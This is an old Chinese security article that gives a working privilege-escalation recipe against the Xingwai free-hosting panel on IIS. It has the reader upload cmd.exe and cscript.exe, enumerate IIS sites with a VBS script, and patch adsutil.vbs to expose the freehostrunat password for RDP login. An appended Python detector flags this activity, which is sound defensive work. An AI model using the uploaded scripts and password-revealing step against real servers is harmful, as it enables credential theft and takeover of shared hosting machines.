星外 (Xingwai) 0day practice notes and privilege escalation summary
Source: vfocus.net  Author: vfocus  Published: 2011-06-30

1. Confirm the host runs Xingwai; the site directory is usually d:\freehost\xxx

2. Find an executable directory; see: http://hi.baidu.com/it%5Fsecurity/blog/item/111ef5eb39ed86c6d539c981.html

3. Upload cmd.exe, cscript.exe, and two VBS scripts:

'1.vbs

' Walk every numbered web site in the IIS metabase and list its ID, comment and root path
Set ObjService=GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
    If IsNumeric(obj3w.Name) Then
        sServerName=Obj3w.ServerComment
        Set webSite = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name & "/Root")
        ListAllWeb = ListAllWeb & obj3w.Name & String(25-Len(obj3w.Name)," ")& obj3w.ServerComment & "(" & webSite.Path & ")" & vbCrLf
    End If
Next
WScript.Echo ListAllWeb
Set ObjService=Nothing

' Used to find the ID of the Xingwai management platform's virtual directory, C:\WINDOWS\7i24.com\FreeHost

'2.vbs

''''''''''''''''''''''''''''''''''''
'
' ADSUTIL.VBS
'
' Date:   7/24/97
' Revision History:
'     Date         Comment
'    7/24/97       Initial version started
'    5/8/98        Bug fixes and ENUM_ALL
'    12/1/98       Fixed display error on list data.
'    7/27/99       AppCreate2 fix
'    8/5/99        Dont display encrypted data
''''''''''''''''''''''''''''''''''''
Option Explicit
On Error Resume Next

''''''''''''''''''
' Main Script Code
''''''''''''''''''
Dim ArgObj ' Object which contains the command line argument
Dim Result ' Result of the command function call
Dim Args(999) ' Array that contains all of the non-global arguments
Dim ArgCount ' Tracks the size of the Args array

' Used for string formatting
Dim Spacer
Dim SpacerSize

Const IIS_DATA_NO_INHERIT = 0
Const IIS_DATA_INHERIT = 1
Const GENERAL_FAILURE = 2
Const GENERAL_WARNING = 1
Const AppCreate_InProc = 0
Const AppCreate_OutOfProc = 1
Const AppCreate_PooledOutOfProc = 2

Const APPSTATUS_NOTDEFINED = 2
Const APPSTATUS_RUNNING = 1
Const APPSTATUS_STOPPED = 0

Spacer = "                                " ' Used to format the strings
SpacerSize = Len(Spacer)

' Note: The default execution mode may be under WScript.exe.
' That would be very annoying since WScript has popups for Echo.
' So, I want to detect that, and warn the user that it may cause
' problems.
DetectExeType

' Get the Arguments object
Set ArgObj = WScript.Arguments

' Test to make sure there is at least one command line arg - the command
' The script is too long to reproduce here; take it from c:\inetpub\AdminScripts\adsutil.vbs and change "IsSecureProperty = True" to "IsSecureProperty = False".
' Used to display the password.

4. Run:

/c "x:\xxx\cscript.exe" c:\xxxx\1.vbs

This returns the IIS information; find the Xingwai ID in it,

then run:

/c "x:\xxx\cscript.exe"  c:\xxxx\2.vbs enum w3svc/ID/root   ' ID here is the number returned by the first script

5. Once the password is displayed, log in directly over 3389 as freehostrunat.
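Seen from the defending side, steps 3 and 4 leave a recognisable process-creation trail: a copy of cscript.exe or cmd.exe running from outside the system directory, launched by the IIS worker, with an adsutil-style `enum w3svc/<id>/root` argument. The following is an added example, not part of the original article; the event field names, the list of IIS parent processes, the default system paths and the sample events are all assumptions constructed for illustration.

```python
import ntpath
import re

# Script hosts and shells that the article uploads next to the web content.
WATCHED = {"cmd.exe", "cscript.exe", "wscript.exe"}
# Where Windows itself keeps these binaries (assumed default install paths).
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# adsutil-style metabase enumeration of a site root, e.g. "enum w3svc/1/root".
METABASE_ENUM = re.compile(r"\benum(_all)?\s+/?w3svc/\d+/root\b", re.I)
# IIS worker / ASP host processes (assumed list) that parent anything a web script spawns.
WEB_PARENTS = {"w3wp.exe", "dllhost.exe", "inetinfo.exe"}


def findings(event):
    """Return the reasons a process-creation event matches this technique."""
    image = event["image"].lower()
    name = ntpath.basename(image)
    reasons = []
    if name in WATCHED and ntpath.dirname(image) not in SYSTEM_DIRS:
        reasons.append("script host or shell running from a non-system path")
    if METABASE_ENUM.search(event["command_line"]):
        reasons.append("IIS metabase enumeration of a site root")
    if name in WATCHED and ntpath.basename(event["parent"].lower()) in WEB_PARENTS:
        reasons.append("spawned by an IIS worker process")
    return reasons


def triage(events):
    """Map each suspicious event index to its reasons; clean events are omitted."""
    return {i: r for i, e in enumerate(events) if (r := findings(e))}


# Constructed sample events; the field names are assumptions, not a real log schema.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cscript.exe", "parent": r"C:\Windows\explorer.exe",
     "command_line": r"cscript.exe C:\scripts\backup.vbs"},
    {"image": r"D:\freehost\site1\web\cscript.exe",
     "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "command_line": r"cscript.exe D:\freehost\site1\web\2.vbs enum w3svc/3/root"},
    {"image": r"C:\Windows\System32\cscript.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc/1/root"},
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["image"], "->", "; ".join(reasons))
```

The third sample shows that a legitimate administrator running the stock adsutil.vbs also trips the metabase rule, so that signal is best weighted together with the path and parent-process signals.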


 